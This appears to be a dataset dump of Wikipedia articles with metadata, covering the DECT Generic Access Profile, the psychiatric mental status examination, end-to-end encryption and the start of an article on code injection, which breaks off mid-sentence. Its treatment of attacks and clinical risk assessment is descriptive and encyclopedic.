The Generic Access Profile (GAP) (ETSI standard EN 300 444) describes a set of mandatory requirements to allow any conforming DECT Fixed Part (base) to interoperate with any conforming DECT Portable Part (handset) to provide basic telephony services when attached to a 3.1 kHz telephone network (as defined by EN 300 176-2). The objective of GAP is to ensure interoperation at the air interface (i.e., the radio connection) and at the level of procedures to establish, maintain and release telephone calls (Call Control). GAP also mandates procedures for registering Portable Parts to a Fixed Part (Mobility Management). A GAP-compliant handset from one manufacturer should work, at the basic level of making calls, with a GAP-compliant base from another manufacturer, although it may be unable to access advanced features of the base station such as phone book synchronization or remote operation of an answering machine. Most consumer-level DECT phones and base stations support the GAP profile, even those that do not publicize the feature, and thus can be used together. However some manufacturers lock their systems to prevent interoperability, or supply bases that cannot register new handsets. The GAP does not describe how the Fixed Part is connected to the external telephone network. See also GSM Interworking Profile References ETSI Telephony DECT
Generic access profile
[ "Technology" ]
285
[ "Mobile telecommunications", "DECT" ]
1,065,357
https://en.wikipedia.org/wiki/Mental%20status%20examination
The mental status examination (MSE) is an important part of the clinical assessment process in neurological and psychiatric practice. It is a structured way of observing and describing a patient's psychological functioning at a given point in time, under the domains of appearance, attitude, behavior, mood and affect, speech, thought process, thought content, perception, cognition, insight, and judgment. There are some minor variations in the subdivision of the MSE and the sequence and names of MSE domains. The purpose of the MSE is to obtain a comprehensive cross-sectional description of the patient's mental state, which, when combined with the biographical and historical information of the psychiatric history, allows the clinician to make an accurate diagnosis and formulation, which are required for coherent treatment planning. The data are collected through a combination of direct and indirect means: unstructured observation while obtaining the biographical and social information, focused questions about current symptoms, and formalised psychological tests. The MSE is not to be confused with the mini–mental state examination (MMSE), which is a brief neuropsychological screening test for dementia. Theoretical foundations The MSE derives from an approach to psychiatry known as descriptive psychopathology or descriptive phenomenology, which developed from the work of the philosopher and psychiatrist Karl Jaspers. From Jaspers' perspective it was assumed that the only way to comprehend a patient's experience is through his or her own description (through an approach of empathic and non-theoretical enquiry), as distinct from an interpretive or psychoanalytic approach which assumes the analyst might understand experiences or processes of which the patient is unaware, such as defense mechanisms or unconscious drives. In practice, the MSE is a blend of empathic descriptive phenomenology and empirical clinical observation. It has been argued that the term phenomenology has become corrupted in clinical psychiatry: current usage, as a set of supposedly objective descriptions of a psychiatric patient (a synonym for signs and symptoms), is incompatible with the original meaning which was concerned with comprehending a patient's subjective experience. Application The mental status examination is a core skill of qualified (mental) health personnel. It is a key part of the initial psychiatric assessment in an outpatient or psychiatric hospital setting. It is a systematic collection of data based on observation of the patient's behavior while the patient is in the clinician's view during the interview. The purpose is to obtain evidence of symptoms and signs of mental disorders, including danger to self and others, that are present at the time of the interview. Further, information on the patient's insight, judgment, and capacity for abstract reasoning is used to inform decisions about treatment strategy and the choice of an appropriate treatment setting. It is carried out in the manner of an informal enquiry, using a combination of open and closed questions, supplemented by structured tests to assess cognition. The MSE can also be considered part of the comprehensive physical examination performed by physicians and nurses although it may be performed in a cursory and abbreviated way in non-mental-health settings. Information is usually recorded as free-form text using the standard headings, but brief MSE checklists are available for use in emergency situations, for example, by paramedics or emergency department staff. The information obtained in the MSE is used, together with the biographical and social information of the psychiatric history, to generate a diagnosis, a psychiatric formulation and a treatment plan. Domains The mnemonic ASEPTIC can be used to remember the domains of the MSE: A - Appearance/Behavior S - Speech E - Emotion (Mood and Affect) P - Perception T - Thought Content and Process I - Insight and Judgement C - Cognition Appearance Clinicians assess the physical aspects such as the appearance of a patient, including apparent age, height, weight, and manner of dress and grooming. Colorful or bizarre clothing might suggest mania, while unkempt, dirty clothes might suggest schizophrenia or depression. If the patient appears much older than his or her chronological age this can suggest chronic poor self-care or ill-health. Clothing and accessories of a particular subculture, body modifications, or clothing not typical of the patient's gender, might give clues to personality. Observations of physical appearance might include the physical features of alcoholism or drug abuse, such as signs of malnutrition, nicotine stains, dental erosion, a rash around the mouth from inhalant abuse, or needle track marks from intravenous drug abuse. Observations can also include any odor which might suggest poor personal hygiene due to extreme self-neglect, or alcohol intoxication. Weight loss could also signify a depressive disorder, physical illness, anorexia nervosa or chronic anxiety. Attitude Attitude, also known as rapport or cooperation, refers to the patient's approach to the interview process and the quality of information obtained during the assessment. Observations of attitude include whether the patient is cooperative, hostile, open or secretive. Behavior Abnormalities of behavior, also called abnormalities of activity, include observations of specific abnormal movements, as well as more general observations of the patient's level of activity and arousal, and observations of the patient's eye contact and gait. Abnormal movements, for example choreiform, athetoid or choreoathetoid movements may indicate a neurological disorder. A tremor or dystonia may indicate a neurological condition or the side effects of antipsychotic medication. The patient may have tics (involuntary but quasi-purposeful movements or vocalizations) which may be a symptom of Tourette's syndrome. There are a range of abnormalities of movement which are typical of catatonia, such as echopraxia, catalepsy, waxy flexibility and paratonia (or gegenhalten). Stereotypies (repetitive purposeless movements such as rocking or head banging) or mannerisms (repetitive quasi-purposeful abnormal movements such as a gesture or abnormal gait) may be a feature of chronic schizophrenia or autism. More global behavioural abnormalities may be noted, such as an increase in arousal and movement (described as psychomotor agitation or hyperactivity) which might reflect mania or delirium. An inability to sit still might represent akathisia, a side effect of antipsychotic medication. Similarly, a global decrease in arousal and movement (described as psychomotor retardation, akinesia or stupor) might indicate depression or a medical condition such as Parkinson's disease, dementia or delirium. The examiner would also comment on eye movements (repeatedly glancing to one side can suggest that the patient is experiencing hallucinations), and the quality of eye contact (which can provide clues to the patient's emotional state). Lack of eye contact may suggest depression or autism. Mood and affect The distinction between mood and affect in the MSE is subject to some disagreement. For example, Trzepacz and Baker (1993) describe affect as "the external and dynamic manifestations of a person's internal emotional state" and mood as "a person's predominant internal state at any one time", whereas Sims (1995) refers to affect as "differentiated specific feelings" and mood as "a more prolonged state or disposition". This article will use the Trzepacz and Baker (1993) definitions, with mood regarded as a current subjective state as described by the patient, and affect as the examiner's inferences of the quality of the patient's emotional state based on objective observation. Mood is described using the patient's own words, and can also be described in summary terms such as neutral, euthymic, dysphoric, euphoric, angry, anxious or apathetic. Alexithymic individuals may be unable to describe their subjective mood state. An individual who is unable to experience any pleasure may have anhedonia. Affect is described by labelling the apparent emotion conveyed by the person's nonverbal behavior (anxious, sad etc.), and also by using the parameters of appropriateness, intensity, range, reactivity and mobility. Affect may be described as appropriate or inappropriate to the current situation, and as congruent or incongruent with their thought content. For example, someone who shows a bland affect when describing a very distressing experience would be described as showing incongruent affect, which might suggest schizophrenia. The intensity of the affect may be described as normal, blunted affect, exaggerated, flat, heightened or overly dramatic. A flat or blunted affect is associated with schizophrenia, depression or post-traumatic stress disorder; heightened affect might suggest mania, and an overly dramatic or exaggerated affect might suggest certain personality disorders. Mobility refers to the extent to which affect changes during the interview: the affect may be described as fixed, mobile, immobile, constricted/restricted or labile. The person may show a full range of affect, in other words a wide range of emotional expression during the assessment, or may be described as having restricted affect. The affect may also be described as reactive, in other words changing flexibly and appropriately with the flow of conversation, or as unreactive. A bland lack of concern for one's disability may be described as showing la belle indifférence, a feature of conversion disorder, which is historically termed "hysteria" in older texts. Speech Speech is assessed by observing the patient's spontaneous speech, and also by using structured tests of specific language functions. This heading is concerned with the production of speech rather than the content of speech, which is addressed under thought process and thought content (see below). When observing the patient's spontaneous speech, the interviewer will note and comment on paralinguistic features such as the loudness, rhythm, prosody, intonation, pitch, phonation, articulation, quantity, rate, spontaneity and latency of speech. Many acoustic features have been shown to be significantly altered in mental health disorders. A structured assessment of speech includes an assessment of expressive language by asking the patient to name objects, repeat short sentences, or produce as many words as possible from a certain category in a set time. Simple language tests also form part of the mini-mental state examination. In practice, the structured assessment of receptive and expressive language is often reported under Cognition (see below). Language assessment will allow the recognition of medical conditions presenting with aphonia or dysarthria, neurological conditions such as stroke or dementia presenting with aphasia, and specific language disorders such as stuttering, cluttering or mutism. People with autism spectrum disorders may have abnormalities in paralinguistic and pragmatic aspects of their speech. Echolalia (repetition of another person's words) and palilalia (repetition of the subject's own words) can be heard with patients with autism, schizophrenia or Alzheimer's disease. A person with schizophrenia might use neologisms, which are made-up words which have a specific meaning to the person using them. Speech assessment also contributes to assessment of mood, for example people with mania or anxiety may have rapid, loud and pressured speech; on the other hand depressed patients will typically have a prolonged speech latency and speak in a slow, quiet and hesitant manner. Thought process Thought process in the MSE refers to the quantity, tempo (rate of flow) and form (or logical coherence) of thought. Thought process cannot be directly observed but can only be described by the patient, or inferred from a patient's speech. Form of the thought is captured in this category. One should describe the thought form as thought directed A→B (normal), versus formal thought disorders. A pattern of interruption or disorganization of thought processes is broadly referred to as formal thought disorder, and might be described more specifically as thought blocking, fusion, loosening of associations, tangential thinking, derailment of thought, knight's move thinking. Thought may be described as 'circumstantial' when a patient includes a great deal of irrelevant detail and makes frequent diversions, but remains focused on the broad topic. Circumstantial thinking might be observed in anxiety disorders or certain kinds of personality disorders. Regarding the tempo of thought, some people may experience 'flight of ideas' (a manic symptom), when their thoughts are so rapid that their speech seems incoherent, although in flight of ideas a careful observer can discern a chain of poetic, syllabic, rhyming associations in the patient's speech (i.e., "I love to eat peaches, beach beaches, sand castles fall in the waves, braves are going to the finals, fee fi fo fum. Golden egg."). Alternatively an individual may be described as having retarded or inhibited thinking, in which thoughts seem to progress slowly with few associations. Poverty of thought is a global reduction in the quantity of thought and one of the negative symptoms of schizophrenia. It can also be a feature of severe depression or dementia. A patient with dementia might also experience thought perseveration. Thought perseveration refers to a pattern where a person keeps returning to the same limited set of ideas. Thought content A description of thought content would be the largest section of the MSE report. It would describe a patient's suicidal thoughts, depressed cognition, delusions, overvalued ideas, obsessions, phobias and preoccupations. One should separate the thought content into pathological thought, versus non-pathological thought. Importantly one should specify suicidal thoughts as either intrusive, unwanted, and not able to translate in the capacity to act on these thoughts (mens rea), versus suicidal thoughts that may lead to the act of suicide (actus reus). Abnormalities of thought content are established by exploring individuals' thoughts in an open-ended conversational manner with regard to their intensity, salience, the emotions associated with the thoughts, the extent to which the thoughts are experienced as one's own and under one's control, and the degree of belief or conviction associated with the thoughts. Delusions A delusion has three essential qualities: it can be defined as "a false, unshakeable idea or belief (1) which is out of keeping with the patient's educational, cultural and social background (2) ... held with extraordinary conviction and subjective certainty (3)", and is a core feature of psychotic disorders. For instance an alliance to a particular political party, or sports team would not be considered a delusion in some societies. The patient's delusions may be described within the SEGUE PM mnemonic as: somatic, erotomanic delusions, grandiose delusions, unspecified delusions, envious delusions (c.f. delusional jealousy), persecutory or paranoid delusions, or multifactorial delusions. There are several other forms of delusions, these include descriptions such as: delusions of reference, or delusional misidentification, or delusional memories (e.g., "I was a goat last year") among others. Delusional symptoms can be reported as on a continuum from: full symptoms (with no insight), partial symptoms (where they may start questioning these delusions), nil symptoms (where symptoms are resolved), or after complete treatment there are still delusional symptoms or ideas that could develop into delusions you can characterize this as residual symptoms. Delusions can suggest several diseases such as schizophrenia, schizophreniform disorder, brief psychotic disorder, mania, depression with psychotic features, or delusional disorders. One can differentiate delusional disorders from schizophrenia for example by the age of onset for delusional disorders being older with a more complete and unaffected personality, where the delusion may only partially impact their life and be fairly encapsulated off from the rest of their formed personalityfor example, believing that a spider lives in their hair, but this belief not affecting their work, relationships, or education. Whereas schizophrenia typically arises earlier in life with a disintegration of personality and a failure to cope with work, relationships, or education. Other features differentiate diseases with delusions as well. Delusions may be described as mood-congruent (the delusional content in keeping with the mood), typical of manic or depressive psychosis, or mood-incongruent (delusional content not in keeping with the mood) which are more typical of schizophrenia. Delusions of control, or passivity experiences (in which the individual has the experience of the mind or body being under the influence or control of some kind of external force or agency), are typical of schizophrenia. Examples of this include experiences of thought withdrawal, thought insertion, thought broadcasting, and somatic passivity. Schneiderian first rank symptoms are a set of delusions and hallucinations which have been said to be highly suggestive of a diagnosis of schizophrenia. Delusions of guilt, delusions of poverty, and nihilistic delusions (belief that one has no mind or is already dead) are typical of depressive psychosis. Overvalued Ideas An overvalued idea is an emotionally charged belief that may be held with sufficient conviction to make believer emotionally charged or aggressive but that fails to possess all three characteristics of delusion—most importantly, incongruity with cultural norms. Therefore, any strong, fixed, false, but culturally normative belief can be considered an "overvalued idea". Hypochondriasis is an overvalued idea that one has an illness, dysmorphophobia that a part of one's body is abnormal, and anorexia nervosa that one is overweight or fat. Obsessions An obsession is an "undesired, unpleasant, intrusive thought that cannot be suppressed through the patient's volition", but unlike passivity experiences described above, they are not experienced as imposed from outside the patient's mind. Obsessions are typically intrusive thoughts of violence, injury, dirt or sex, or obsessive ruminations on intellectual themes. A person can also describe obsessional doubt, with intrusive worries about whether they have made the wrong decision, or forgotten to do something, for example turn off the gas or lock the house. In obsessive-compulsive disorder, the individual experiences obsessions with or without compulsions (a sense of having to carry out certain ritualized and senseless actions against their wishes). Phobias A phobia is "a dread of an object or situation that does not in reality pose any threat", and is distinct from a delusion in that the patient is aware that the fear is irrational. A phobia is usually highly specific to certain situations and will usually be reported by the patient rather than being observed by the clinician in the assessment interview. Preoccupations Preoccupations are thoughts which are not fixed, false or intrusive, but have an undue prominence in the person's mind. Clinically significant preoccupations would include thoughts of suicide, homicidal thoughts, suspicious or fearful beliefs associated with certain personality disorders, depressive beliefs (for example that one is unloved or a failure), or the cognitive distortions of anxiety and depression. Suicidal thoughts The MSE contributes to clinical risk assessment by including a thorough exploration of any suicidal or hostile thought content. Assessment of suicide risk includes detailed questioning about the nature of the person's suicidal thoughts, belief about death, reasons for living, and whether the person has made any specific plans to end his or her life. The most important questions to ask are: Do you have suicidal feeling now; have you ever attempted suicide (highly correlated with future suicide attempts); do you have plans to commit suicide in the future; and, do you have any deadlines where you may commit suicide (e.g., numerology calculation, doomsday belief, Mother's Day, anniversary, Christmas). Perceptions A perception in this context is any sensory experience, and the three broad types of perceptual disturbance are hallucinations, pseudohallucinations and illusions. A hallucination is defined as a sensory perception in the absence of any external stimulus, and is experienced in external or objective space (i.e. experienced by the subject as real). An illusion is defined as a false sensory perception in the presence of an external stimulus, in other words a distortion of a sensory experience, and may be recognized as such by the subject. A pseudohallucination is experienced in internal or subjective space (for example as "voices in my head") and is regarded as akin to fantasy. Other sensory abnormalities include a distortion of the patient's sense of time, for example déjà vu, or a distortion of the sense of self (depersonalization) or sense of reality (derealization). Hallucinations can occur in any of the five senses, although auditory and visual hallucinations are encountered more frequently than tactile (touch), olfactory (smell) or gustatory (taste) hallucinations. Auditory hallucinations are typical of psychoses: third-person hallucinations (i.e. voices talking about the patient) and hearing one's thoughts spoken aloud (gedankenlautwerden or écho de la pensée) are among the Schneiderian first rank symptoms indicative of schizophrenia, whereas second-person hallucinations (voices talking to the patient) threatening or insulting or telling them to commit suicide, may be a feature of psychotic depression or schizophrenia. Visual hallucinations are generally suggestive of organic conditions such as epilepsy, drug intoxication or drug withdrawal. Many of the visual effects of hallucinogenic drugs are more correctly described as visual illusions or visual pseudohallucinations, as they are distortions of sensory experiences, and are not experienced as existing in objective reality. Auditory pseudohallucinations are suggestive of dissociative disorders. Déjà vu, derealization and depersonalization are associated with temporal lobe epilepsy and dissociative disorders. Cognition This section of the MSE covers the patient's level of alertness, orientation, attention, memory, visuospatial functioning, language functions and executive functions. Unlike other sections of the MSE, use is made of structured tests in addition to unstructured observation. Alertness is a global observation of level of consciousness, i.e. awareness of and responsiveness to the environment, and this might be described as alert, clouded, drowsy, or stuporous. Orientation is assessed by asking the patient where he or she is (for example what building, town and state) and what time it is (time, day, date). Attention and concentration are assessed by several tests, commonly serial sevens test subtracting 7 from 100 and subtracting 7 from the difference 5 times. Alternatively: spelling a five-letter word backwards, saying the months or days of the week in reverse order, serial threes (subtract three from twenty five times), and by testing digit span. Memory is assessed in terms of immediate registration (repeating a set of words), short-term memory (recalling the set of words after an interval, or recalling a short paragraph), and long-term memory (recollection of well known historical or geographical facts). Visuospatial functioning can be assessed by the ability to copy a diagram, draw a clock face, or draw a map of the consulting room. Language is assessed through the ability to name objects, repeat phrases, and by observing the individual's spontaneous speech and response to instructions. Executive functioning can be screened for by asking the "similarities" questions ("what do x and y have in common?") and by means of a verbal fluency task (e.g. "list as many words as you can starting with the letter F, in one minute"). The mini-mental state examination is a simple structured cognitive assessment which is in widespread use as a component of the MSE. Mild impairment of attention and concentration may occur in any mental illness where people are anxious and distractible (including psychotic states), but more extensive cognitive abnormalities are likely to indicate a gross disturbance of brain functioning such as delirium, dementia or intoxication. Specific language abnormalities may be associated with pathology in Wernicke's area or Broca's area of the brain. In Korsakoff's syndrome there is dramatic memory impairment with relative preservation of other cognitive functions. Visuospatial or constructional abnormalities here may be associated with parietal lobe pathology, and abnormalities in executive functioning tests may indicate frontal lobe pathology. This kind of brief cognitive testing is regarded as a screening process only, and any abnormalities are more carefully assessed using formal neuropsychological testing. The MSE may include a brief neuropsychiatric examination in some situations. Frontal lobe pathology is suggested if the person cannot repetitively execute a motor sequence (e.g. "paper-scissors-rock"). The posterior columns are assessed by the person's ability to feel the vibrations of a tuning fork on the wrists and ankles. The parietal lobe can be assessed by the person's ability to identify objects by touch alone and with eyes closed. A cerebellar disorder may be present if the person cannot stand with arms extended, feet touching and eyes closed without swaying (Romberg's sign); if there is a tremor when the person reaches for an object; or if he or she is unable to touch a fixed point, close the eyes and touch the same point again. Pathology in the basal ganglia may be indicated by rigidity and resistance to movement of the limbs, and by the presence of characteristic involuntary movements. A lesion in the posterior fossa can be detected by asking the patient to roll his or her eyes upwards (Parinaud's syndrome). Focal neurological signs such as these might reflect the effects of some prescribed psychiatric medications, chronic drug or alcohol use, head injuries, tumors or other brain disorders. Insight The person's understanding of his or her mental illness is evaluated by exploring his or her explanatory account of the problem, and understanding of the treatment options. In this context, insight can be said to have three components: recognition that one has a mental illness, compliance with treatment, and the ability to re-label unusual mental events (such as delusions and hallucinations) as pathological. As insight is on a continuum, the clinician should not describe it as simply present or absent, but should report the patient's explanatory account descriptively. Impaired insight is characteristic of psychosis and dementia, and is an important consideration in treatment planning and in assessing the capacity to consent to treatment. Anosognosia is the clinical term for the condition in which the patient is unaware of their neurological deficit or psychiatric condition. Judgment Judgment refers to the patient's capacity to make sound, reasoned and responsible decisions. One should frame judgement to the functions or domains that are normal versus impaired (e.g., poor judgement is isolated to petty theft, able to function in relationships, work, academics). Traditionally, the MSE included the use of standard hypothetical questions such as "what would you do if you found a stamped, addressed envelope lying in the street?"; however contemporary practice is to inquire about how the patient has responded or would respond to real-life challenges and contingencies. Assessment would take into account the individual's executive system capacity in terms of impulsiveness, social cognition, self-awareness and planning ability. Impaired judgment is not specific to any diagnosis but may be a prominent feature of disorders affecting the frontal lobe of the brain. If a person's judgment is impaired due to mental illness, there might be implications for the person's safety or the safety of others. Cultural considerations There are potential problems when the MSE is applied in a cross-cultural context, when the clinician and patient are from different cultural backgrounds. For example, the patient's culture might have different norms for appearance, behavior and display of emotions. Culturally normative spiritual and religious beliefs need to be distinguished from delusions and hallucinations these may seem similar to one who does not understand that they have different roots. Cognitive assessment must also take the patient's language and educational background into account. Clinician's racial bias is another potential confounder. Consultation with cultural leaders in community or clinicians when working with Aboriginal people can help guide if any cultural phenomena has been considered when completing an MSE with Aboriginal patients and things to consider from a cross-cultural context. Children There are particular challenges in carrying out an MSE with young children and others with limited language such as people with intellectual impairment. The examiner would explore and clarify the individual's use of words to describe mood, thought content or perceptions, as words may be used idiosyncratically with a different meaning from that assumed by the examiner. In this group, tools such as play materials, puppets, art materials or diagrams (for instance with multiple choices of facial expressions depicting emotions) may be used to facilitate recall and explanation of experiences. See also Diagnostic classification and rating scales used in psychiatry Diagnostic and Statistical Manual of Mental Disorders DSM-IV Codes Glossary of psychiatry Self-administered Gerocognitive Examination (SAGE) Footnotes References Adams, Yolonda, et al. (2010) Principles of Practice in Mental Health Assessment with Aboriginal Australians. ‌ Further reading External links University of Utah Medical School: Video clips demonstrating cognitive assessment Principles of Practice in Mental Health Assessment with Aboriginal Australians Psychiatric assessment Clinical psychology Medical diagnosis Medical mnemonics
Mental status examination
[ "Biology" ]
6,131
[ "Behavioural sciences", "Behavior", "Clinical psychology" ]
1,065,362
https://en.wikipedia.org/wiki/End-to-end%20encryption
End-to-end encryption (E2EE) is a method of implementing a secure communication system where only communicating users can participate. No one else, including the system provider, telecom providers, Internet providers or malicious actors, can access the cryptographic keys needed to read or send messages. End-to-end encryption prevents data from being read or secretly modified, except by the true sender and intended recipients. Frequently, the messages are relayed from the sender to the recipients by a service provider. However, messages are encrypted by the sender and no third party, including the service provider, has the means to decrypt them. The recipients retrieve the encrypted messages and decrypt them independently. Since third parties cannot decrypt the data being communicated or stored, services that provide end-to-end encryption are better at protecting user data when they are affected by data breaches. Such services are also unable to share user data with government authorities, domestic or international. In 2022, the UK's Information Commissioner's Office, the government body responsible for enforcing online data standards, stated that opposition to E2EE was misinformed and the debate too unbalanced, with too little focus on benefits, since E2EE helped keep children safe online and law enforcement access to stored data on servers was "not the only way" to find abusers. E2EE and privacy In many non-E2EE messaging systems, including email and many chat networks, messages pass through intermediaries and are stored by a third party service provider, from which they are retrieved by the recipient. Even if the messages are encrypted, they are only encrypted 'in transit', and are thus accessible by the service provider. Server-side disk encryption is also distinct from E2EE because it does not prevent the service provider from viewing the information, as they have the encryption keys and can simply decrypt it. The lack of end-to-end encryption can allow service providers to easily provide search and other features, or to scan for illegal and unacceptable content. However, it also means that content can be read by anyone who has access to the data stored by the service provider, by design or via a backdoor. This can be a concern in many cases where privacy is important, such as in governmental and military communications, financial transactions, and when sensitive information such as health and biometric data are sent. If this content were shared without E2EE, a malicious actor or adversarial government could obtain it through unauthorized access or subpoenas targeted at the service provider. E2EE alone does not guarantee privacy or security. For example, data may be held unencrypted on the user's own device, or be accessible via their own app, if their login is compromised. Etymology The term "end-to-end encryption" originally only meant that the communication is never decrypted during its transport from the sender to the receiver. For example, around 2003, E2EE has been proposed as an additional layer of encryption for GSM or TETRA, in addition to the existing radio encryption protecting the communication between the mobile device and the network infrastructure. This has been standardized by SFPG for TETRA. Note that in TETRA E2EE, the keys are generated by a Key Management Centre (KMC) or a Key Management Facility (KMF), not by the communicating users. Later, around 2014, the meaning of "end-to-end encryption" started to evolve when WhatsApp encrypted a portion of its network, requiring that not only the communication stays encrypted during transport, This new meaning is now the widely accepted one. Modern usage As of 2016, typical server-based communications systems do not include end-to-end encryption. These systems can only guarantee the protection of communications between clients and servers, meaning that users have to trust the third parties who are running the servers with the sensitive content. End-to-end encryption is regarded as safer because it reduces the number of parties who might be able to interfere or break the encryption. In the case of instant messaging, users may use a third-party client or plugin to implement an end-to-end encryption scheme over an otherwise non-E2EE protocol. Some non-E2EE systems, such as Lavabit and Hushmail, have described themselves as offering "end-to-end" encryption when they did not. Other systems, such as Telegram and Google Allo, have been criticized for not enabling end-to-end encryption by default. Telegram did not enable end-to-end encryption by default on VoIP calls while users were using desktop software version, but that problem was fixed quickly. However, as of 2020, Telegram still features no end-to-end encryption by default, no end-to-end encryption for group chats, and no end-to-end encryption for its desktop clients. In 2022, Facebook Messenger came under scrutiny because the messages between a mother and daughter in Nebraska were used to seek criminal charges in an abortion-related case against both of them. The daughter told the police that she had a miscarriage and tried to search for the date of her miscarriage in her Messenger app. Police suspected there could be more information within the messages and obtained and served a warrant against Facebook to gain access. The messages allegedly mentioned the mother obtaining abortion pills for her daughter and then burning the evidence. Facebook expanded default end-to-end encryption in the Messenger app just days later. Writing for Wired, Albert Fox Cahn criticized Messenger's approach to end-to-end encryption, which was not enabled by default, required opt-in for each conversation, and split the message thread into two chats which were easy for the user to confuse. Some encrypted backup and file sharing services provide client-side encryption. This type of encryption is not referred to as end-to-end encryption because only one end has the ability to decrypt the data. However, the term "end-to-end encryption" is sometimes incorrectly used to describe client-side encryption. Challenges Man-in-the-middle attacks End-to-end encryption ensures that data is transferred securely between endpoints. But, rather than try to break the encryption, an eavesdropper may impersonate a message recipient (during key exchange or by substituting their public key for the recipient's), so that messages are encrypted with a key known to the attacker. After decrypting the message, the snoop can then encrypt it with a key that they share with the actual recipient, or their public key in case of asymmetric systems, and send the message on again to avoid detection. This is known as a man-in-the-middle attack (MITM). Authentication Most end-to-end encryption protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, one could rely on certification authorities or a web of trust. An alternative technique is to generate cryptographic hashes (fingerprints) based on the communicating users’ public keys or shared secret keys. The parties compare their fingerprints using an outside (out-of-band) communication channel that guarantees integrity and authenticity of communication (but not necessarily secrecy), before starting their conversation. If the fingerprints match, there is, in theory, no man in the middle. When displayed for human inspection, fingerprints usually use some form of binary-to-text encoding. These strings are then formatted into groups of characters for readability. Some clients instead display a natural language representation of the fingerprint. As the approach consists of a one-to-one mapping between fingerprint blocks and words, there is no loss in entropy. The protocol may choose to display words in the user's native (system) language. This can, however, make cross-language comparisons prone to errors. In order to improve localization, some protocols have chosen to display fingerprints as base 10 strings instead of more error prone hexadecimal or natural language strings. An example of the base 10 fingerprint (called safety number in Signal and security code in WhatsApp) would be: 37345 35585 86758 07668 05805 48714 98975 19432 47272 72741 60915 64451 Other applications such as Telegram, instead, encode fingerprints using emojis. Modern messaging applications can also display fingerprints as QR codes that users can scan off each other's devices. Endpoint security The end-to-end encryption paradigm does not directly address risks at the communications endpoints themselves. Each user's computer can still be hacked to steal their cryptographic key (to create a MITM attack) or simply read the recipients’ decrypted messages both in real time and from log files. Even the most perfectly encrypted communication pipe is only as secure as the mailbox on the other end. Major attempts to increase endpoint security have been to isolate key generation, storage and cryptographic operations to a smart card such as Google's Project Vault. However, since plaintext input and output are still visible to the host system, malware can monitor conversations in real time. A more robust approach is to isolate all sensitive data to a fully air gapped computer. PGP has been recommended by experts for this purpose. However, as Bruce Schneier points out, Stuxnet developed by US and Israel successfully jumped air gap and reached Natanz nuclear plant's network in Iran. To deal with key exfiltration with malware, one approach is to split the Trusted Computing Base behind two unidirectionally connected computers that prevent either insertion of malware, or exfiltration of sensitive data with inserted malware. Backdoors A backdoor is usually a secret method of bypassing normal authentication or encryption in a computer system, a product, an embedded device, etc. Companies may also willingly or unwillingly introduce backdoors to their software that help subvert key negotiation or bypass encryption altogether. In 2013, information leaked by Edward Snowden showed that Skype had a backdoor which allowed Microsoft to hand over their users' messages to the NSA despite the fact that those messages were officially end-to-end encrypted. Following terrorist attacks in San Bernardino in 2015 and Pensacola in 2019, the FBI requested backdoors to Apple's iPhone software. The company, however, refused to create a backdoor for the government, citing concern that such a tool could pose risk for its consumers’ privacy. Compliance and regulatory requirements for content inspection While E2EE can offer privacy benefits that make it desirable in consumer-grade services, many businesses have to balance these benefits with their regulatory requirements. For example, many organizations are subject to mandates that require them to be able to decrypt any communication between their employees or between their employees and third parties. This might be needed for archival purposes, for inspection by Data Loss Prevention (DLP) systems, for litigation-related eDiscovery or for detection of malware and other threats in the data streams. For this reason, some enterprise-focused communications and information protection systems might implement encryption in a way that ensures all transmissions are encrypted with the encryption being terminated at their internal systems (on-premises or cloud-based) so they can have access to the information for inspection and processing. See also Comparison of instant messaging protocols – a table overview of VoIP clients that offer end-to-end encryption Diffie–Hellman key exchange – method of negotiating secret keys for the communicating users without sharing them with observers, such as the communication system provider End-to-end auditable voting systems Point-to-point encryption Crypto Wars References Further reading Cryptography Telecommunications Secure communication Internet privacy Computer networks engineering
End-to-end encryption
[ "Mathematics", "Technology", "Engineering" ]
2,437
[ "Information and communications technology", "Cybersecurity engineering", "Cryptography", "Computer engineering", "Applied mathematics", "Computer networks engineering", "Telecommunications" ]
1,065,470
https://en.wikipedia.org/wiki/Code%20injection
Code injection is a computer security exploit where a program fails to correctly process external data, such as user input, causing it to interpret the data as executable commands. An attacker using this method "injects" code into the program while it is running. Successful exploitation of a code injection vulnerability can result in data breaches, access to restricted or critical computer systems, and the spread of malware. Code injection vulnerabilities occur when an application sends untrusted data to an interpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers, operating system commands, Simple Mail Transfer Protocol (SMTP) headers, and other program arguments. Injection flaws can be identified through source code examination, Static analysis, or dynamic testing methods such as fuzzing. There are numerous types of code injection vulnerabilities, but most are errors in interpretation—they treat benign user input as code or fail to distinguish input from system commands. Many examples of interpretation errors can exist outside of computer science, such as the comedy routine "Who's on First?". Code injection can be used maliciously for many purposes, including: Arbitrarily modifying values in a database through SQL injection; the impact of this can range from website defacement to serious compromise of sensitive data. For more information, see Arbitrary code execution. Installing malware or executing malevolent code on a server by injecting server scripting code (such as PHP). Privilege escalation to either superuser permissions on UNIX by exploiting shell injection vulnerabilities in a binary file or to Local System privileges on Microsoft Windows by exploiting a service within Windows. Attacking web users with Hyper Text Markup Language (HTML) or Cross-Site Scripting (XSS) injection. Code injections that target the Internet of Things could also lead to severe consequences such as data breaches and service disruption. Code injections can occur on any type of program running with an interpreter. Doing this is trivial to most, and one of the primary reasons why server software is kept away from users. An example of how you can see code injection first-hand is to use your browser's developer tools. Code injection vulnerabilities are recorded by the National Institute of Standards and Technology (NIST) in the National Vulnerability Database (NVD) as CWE-94. Code injection peaked in 2008 at 5.66% as a percentage of all recorded vulnerabilities. Benign and unintentional use Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent. Code injection could, for example: Introduce a useful new column that did not appear in the original design of a search results page. Offer a new way to filter, order, or group data by using a field not exposed in the default functions of the original design. Add functionality like connecting to online resources in an offline program. Override a function, making calls redirect to another implementation. This can be done with the Dynamic linker in Linux. Some users may unsuspectingly perform code injection because the input they provided to a program was not considered by those who originally developed the system. For example: What the user may consider as valid input may contain token characters or strings that have been reserved by the developer to have special meaning (such as the ampersand or quotation marks). The user may submit a malformed file as input that is handled properly in one application but is toxic to the receiving system. Another benign use of code injection is the discovery of injection flaws to find and fix vulnerabilities. This is known as a penetration test. Preventing Code Injection To prevent code injection problems, the person could use secure input and output handling strategies, such as: Using an application programming interface (API) that, if used properly, is secure against all input characters. Parameterized queries allow the moving of user data out of a string to be interpreted. Additionally, Criteria API and similar APIs move away from the concept of command strings to be created and interpreted. Enforcing language separation via a static 